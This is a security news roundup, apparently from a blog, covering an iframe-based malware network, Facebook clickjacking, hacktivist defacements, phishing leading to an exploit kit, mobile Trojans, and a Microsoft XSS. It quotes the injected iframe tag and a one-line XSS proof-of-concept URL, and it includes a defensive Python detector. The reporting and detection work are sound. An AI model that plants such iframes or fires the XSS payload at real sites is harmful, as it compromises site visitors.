Distributed malware network comprised of thousands of websites

Thousands of websites are being hacked and added to a distributed malware network, warn researchers at Sucuri Labs. The sites are being injected with the following iframe:

<iframe src="http://hackedsite.com/stats.php" name="Twitter" ..

"Once inserted, these iFrames can be controlled to distribute the malware of course, but they can also be used to add things like drive-by downloads, and other types of browser-based attacks. Although the exact vector is unknown, the malware has been found across sites with known outdated software, and in some cases known vulnerable versions," the Sucuri blog post reads.

How does a distributed web-based malware network function?
Site-X.com is hacked and a malicious file named stats.php is placed on it. An iframe pointing to Site-Y.com/stats.php is then added to Site-X.com's source code. Site-Y.com is also compromised: it has its own stats.php file added, plus an iframe pointing to Site-Z.com/stats.php.

"When all is said and done, you have a large network of compromised sites, all linking to each other and all with the same malware."
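To show how a site owner could spot this pattern in their own pages, here is an added Python example (not code from Sucuri or from this blog). It scans constructed sample HTML for the reported marker (an iframe with name="Twitter" whose src is a stats.php on another host) and follows the resulting chain between hosts; the hostnames are placeholders.

```python
import re
from urllib.parse import urlparse

# Constructed sample pages (placeholder hostnames) mimicking the described chain:
# X embeds Y's stats.php, Y embeds Z's stats.php, Z is (still) clean.
SAMPLE_PAGES = {
    "site-x.example": '<html><body><p>Welcome</p>'
        '<iframe src="http://site-y.example/stats.php" name="Twitter" '
        'width="1" height="1" style="visibility:hidden"></iframe></body></html>',
    "site-y.example": '<html><body><iframe src="http://site-z.example/stats.php" '
        'name="Twitter"></iframe>'
        '<iframe src="https://www.youtube.com/embed/abc"></iframe></body></html>',
    "site-z.example": '<html><body><p>Clean page</p></body></html>',
}

IFRAME_RE = re.compile(r'<iframe\b[^>]*>', re.IGNORECASE)   # opening iframe tags
ATTR_RE = re.compile(r'(\w+)\s*=\s*"([^"]*)"')              # double-quoted attributes


def find_injected_iframes(host, html):
    """Return iframe src URLs in `html` matching the reported injection pattern:
    cross-domain src whose path ends in /stats.php and name="Twitter"."""
    hits = []
    for tag in IFRAME_RE.findall(html):
        attrs = {k.lower(): v for k, v in ATTR_RE.findall(tag)}
        src = attrs.get("src", "")
        parsed = urlparse(src)
        target = parsed.hostname or ""
        if (parsed.path.endswith("/stats.php")
                and attrs.get("name") == "Twitter"
                and target and target != host):
            hits.append(src)
    return hits


def build_chain(pages):
    """Map each host to the hosts its injected iframes point at."""
    return {host: [urlparse(u).hostname for u in find_injected_iframes(host, html)]
            for host, html in pages.items()}


def trace(pages, start):
    """Follow the iframe chain from `start`, stopping at a clean host or a loop."""
    graph = build_chain(pages)
    chain, seen, host = [], set(), start
    while host and host not in seen:
        seen.add(host)
        chain.append(host)
        nxt = graph.get(host, [])
        host = nxt[0] if nxt else None
    return chain
```

Run against live pages, the same check can be fed with fetched HTML; the legitimate YouTube embed on site-y is deliberately left unflagged.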

Facebook Scam: At 17, she did THIS in public high school, EVERY day! Outrageous?


There is a video floating around Facebook with a headline that reads "[SHOCK] At 17, she did THIS in public high school, EVERY day! Outrageous?". Clicking the link leads you to a Blogspot page which pretends it is about to show you a video.

After analyzing the webpage, I found that the scam targets only users from Australia, the U.S., Canada, South Africa, France, Ireland and the UK. When a user from another country tries to visit the link, they are redirected to google.com.

[Image: script used to identify the visitor's country]


The page pretends it is about to show you a video. However, the "play" button on the video hides a hidden "Like" button, so clicking it shares the link further across your social network by clickjacking, helping the scammers spread their link virally.

[Image: Facebook Like script]


There are numerous sites that mirror this. You should always be careful about what you click on Facebook.

[Image: a few of the attackers' sites]

Presidency of Paraguay website hacked by Anonymous


The official website of the Presidency of Paraguay (presidencia.gov.py) has been hacked by Paraguay Unlocker Security, a group of Anonymous-affiliated hackers.

The site’s main page has been defaced to host a couple of images and a message to the government.

“[Expletive] this [expletive]. Government stop robbing people and build a better country,” reads a translation of the hackers' statement.

The website’s main page isn’t the only one affected by the breach. The hacktivists have also posted short messages and images on the photo album, videos, news, agenda, and presidency TV web pages.

The Facebook page and the Twitter account of the “Presidencia Paraguay” don’t seem to be impacted.

At the time of writing, the site still displayed all the messages and pictures published by Anonymous.

American Express 'forgotten user ID' spam mail leads to BlackHole Exploit Kit

NSS Labs has spotted a phishing campaign targeting American Express customers. The phishing emails ask users if they have recently reset their password, or verified their user ID for their American Express Card account online.

“Did you recently verify your User ID or reset the password that you use to manage your American Express Card account online?” reads the malicious notification.

Unlike ordinary phishing mails, the link in this mail leads to a website that hosts a variant of the Blackhole exploit kit.

The Blackhole exploit kit exploits known vulnerabilities in Java, Adobe Reader and other software. After successfully exploiting a vulnerability, the site installs a Trojan downloader on the victim's system.

Once the Trojan downloader has been installed, anything from fake security products to keystroke loggers to eavesdropping software can follow.

Find & Call: malicious iPhone app found in Apple's iTunes Store


The recent report from Kaspersky on a malicious iPhone app has spread like wildfire on the Internet. Security experts were debating after Kaspersky Lab's Denis Maslennikov said that a Trojan horse - malicious software that pretends to be something innocuous - had gotten past Apple's famously tough App Store vetting process, which had never before let in real malware.

"The application is called 'Find and Call' and can be found in both the iOS Apple App Store and Android’s Google Play," Maslennikov wrote in a blog posting.

Find and Call, made by a Russian firm, claims to be an app that lets you make phone calls by simply typing in or clicking a contact's email address or social-network handle — admittedly a useful idea.

"In order to call somebody from your mobile phone, you can use an email address, a domain name, a profile address in a social network, etc., instead of a phone number just as easily," states the Find and Call official website.

But Maslennikov said Find and Call also copies a user's entire address book to its own servers, and sends out spam text messages to everyone in the address book imploring them to also install the app.

Screenshots of complaints by angry Russian users in the iOS App Store and Google Play, and Maslennikov's own screenshots of code within the app, support his assertion.

Nowhere in Find and Call's terms of use does it say that the app will copy your address book or send out text messages to your friends, Maslennikov said.

An email from Find and Call support staff to the Russian site AppleInsider.ru stated that the sending of "inviting SMS messages" was a "bug in process of fixing."

Sophos Labs' Vanja Svajcer had doubts about whether this behavior really was malicious, or just annoying.

"I'm not sure I 100 percent agree with Kaspersky that it is malware," Svajcer wrote on Sophos' Naked Security blog. "It would probably be more accurate to say that the 'Find and Call' app is 'spammy.'"

Both Google and Apple have removed the app from their websites.

According to a Softpedia report, Find and Call's creators have contacted AppleInsider.ru and told them that the app is still in "beta-testing." The fact that SMSs are sent out to all the contacts is allegedly just a bug.

Boxer SMS Trojan poses as Firefox for Android

Recently, Mozilla launched Firefox 14 for devices running Android. Cyber-criminals turned the event to their advantage and started masquerading an SMS Trojan as Firefox.

Security researchers at GFI Labs spotted an Android application posing as the popular web browser Firefox, hosted on several Russian websites. The Android application files (.APK) that users can download from these sites vary not only in file name but also in file size.

GFI VIPRE Mobile Security detects the malicious apps as Trojan.AndroidOS.Boxer.d.

The typical Boxer malware appears to be a legitimate app that users can download. Once installed, it loads a Rules page on the phone and asks users to accept it. The app then sends a premium SMS message to any of these numbers: 2855, 3855, 7151, or 8151. The Rules page discloses (in small text) that users will be billed for sending a premium SMS message. Boxer then directs users to the actual website where the legitimate app can be downloaded after claiming that it has successfully activated.

However, this particular variant doesn’t give any details regarding its true purpose. This variant sends the premium SMS message, “5975+3480758+x+a”, to the aforementioned numbers. Lastly, it loads google.com instead of directing users to the actual download site.

Researchers believe that this may be a tactic to make users think that the application is defective. They might download and install the fake software again, allowing Boxer to perform its malicious tasks more than once.

TriCk - The leader of the hacker group "TeaMp0isoN" pleads guilty

The leader of the hacker group "TeaMp0isoN" has pleaded guilty to stealing the address book details and other private data from former British Prime Minister Tony Blair in June of last year.

Junaid Hussain, also known as "TriCk", has now admitted to hacking into a Gmail account belonging to an adviser to Blair by the name of Katy Kay.

Hussain, 18, from Birmingham, said that he used an ID "Trick" to access the aide's account and steal confidential data including addresses, phone numbers and email addresses belonging to Blair, his wife, and sister-in-law Lyndsye Booth, as well as Members of Parliament (MPs) and Members of the House of Lords.

Ben Cooper, Hussain's lawyer, told the court that the offences had just been a prank.

After admitting to conspiracy and computer charges at London's Southwark Crown Court, Judge Peter Testar granted Hussain bail until sentencing later this month, advising him to be "under no illusions" that he may go to prison.

Hussain has also confessed to taking part in and leading members of the hacker group to attack the UK national Anti-Terrorist Hotline with hundreds of hoax phone calls.

Citadel Trojan is going off the Open Market

A spokesperson for the minds behind the Citadel Trojan said recently on an underground forum that the malware would no longer be publicly available, according to RSA.

According to RSA’s FraudAction Research Labs, a spokesperson for the creators of the Citadel Trojan declared on an underground forum after the recent release of the Trojan’s latest version (v1.3.4.5) that the software would no longer be publicly available and only existing customers would be able to receive upgrades.

Others who wish to purchase a new kit would have to get an existing customer to vouch for them. It remains to be seen if the developers will actually pull it off digital shelves, a spokesperson for EMC’s RSA security division told eWEEK July 2.

"While this could be a marketing stunt designed to create urgency and generate more sales, Citadel's developers could also be seeing the need to slow down sales," the RSA blog post reads.

“By selling less, they can keep the Trojan from being all too widely spread, which will invariably lead to more sampling and research and cause them the need to rework its evasion mechanisms. Additionally, more customers also means more support, more underground buzz, and eventually—as with Zeus, SpyEye, and Carberp—more cyber-crime arrests linked with using Citadel.”

Citadel is built on the source code of the notorious Zeus Trojan typically linked to the theft of banking credentials and fraud. In May, the Internet Crime Complaint Center (IC3), a multi-agency task force consisting of the FBI, the National White Collar Crime Center (NW3C) and the Bureau of Justice Assistance, warned that the Citadel platform was being used to deliver ransomware known as Reveton.

Today, Citadel is the most advanced crimeware tool money can buy, RSA said. Sold for $2,500, attackers can also purchase plug-ins for an average of $1,000 each.

"Malware developers working on criminal-popular projects like Citadel rightfully fear law enforcement. Their actions of developing, supporting and selling advanced crimeware makes them an accessory to the crimes which can easily get them indicted alongside their botmaster customers. The more popular the banking Trojan becomes, the more banks and merchants push to have its developers and bot masters behind bars."

"Looking to the surrounding cybercrime arena, history proves that malware coders know when to leave the room. To date, developers of popular Trojans like Zeus’ Slavik, SpyEye’s Gribodemon, and Ice IX’s GSS have never been arrested and we are seeing the Citadel’s team already taking measures to go deeper underground for their own safety."

XSS vulnerability found in Microsoft.com

A security researcher, Gambit, has discovered a cross-site scripting vulnerability in Microsoft's official website.

He found the vulnerability last month and reported it to Microsoft.

"Well last month I was looking around on MSN.com and Microsoft.com I found two XSS vulnerabilities, one in each domain. I reported the vulnerabilities to the Microsoft security team and secured a spot on their acknowledgments page," Gambit said in his blog.


Microsoft listed his name in the 'Security Researcher Acknowledgments for Microsoft Online Services' page.

The 'asia.perf.glbdns.microsoft.com' page is vulnerable to XSS. The researcher managed to execute XSS code on the page.


POC: "asia.perf.glbdns.microsoft.com/files/top.php?domain=<script>alert(/Gambit/)</script>"

#OpLiberation : Oak Creek Ranch School hacked by Anonymous


An Anonymous-affiliated hacker that goes by the name of Antidote (AnonAntidote) has taken credit for defacing the website of the Oak Creek Ranch School (ocrs.com), Arizona.

The breach is part of Operation Liberation, a campaign that aims to protest abuses that take place against teenagers in certain educational institutions.


“You make your money off the naive, the lazy and the misguided parents leading them to believe that you are helping their sons and daughters to be healed, educated and treated,” Antidote said.

“Putting in place point systems to buy necessities as well as privileges and providing punishment and abuse to those who wander stray of them. In reality this doesn’t treat or help them but instead lowers self-esteem. Simply expelling students that you can’t control while keeping the hard earned money given by the parents.”


The hacker also leaked the school's mailing list, consisting of over 300 records, which may indicate that he had gained access to the organization's databases.

Operation Liberation was launched back in August 2011 and has claimed many victims since.

“For years, teenagers have had to suffer from countless years of torture and brainwashing in so called ‘troubled teen camps.’ These include camps like Cross Creek in Utah, and Paradise Cove in Samoa,” hacktivists said at the time.

“We will not stand for the abuse against these children, we will make sure all of the schools, and the sponsors who started these schools, the WWASP, will suffer consequences for their actions against the civil rights of the youth.”

0-day XML Core Services vulnerability (CVE-2012-1889) included in Blackhole exploit kit

A few weeks ago, we published news about a vulnerability in Microsoft XML Core Services (CVE-2012-1889). The vulnerability is a true zero-day, exploited in the wild, with no patch yet available from Microsoft.

Sophos researchers discovered that the exploit for this vulnerability has been added to the Blackhole exploit kit.


A new function has been added to the Blackhole exploit kit that targets CVE-2012-1889. The function uses well-documented heap-spray techniques to place the shellcode in memory before triggering the vulnerability, so that execution passes to that shellcode.

The shellcode is pretty straightforward: it attempts to download the payload (a DLL) from a remote server and writes it to the temp folder.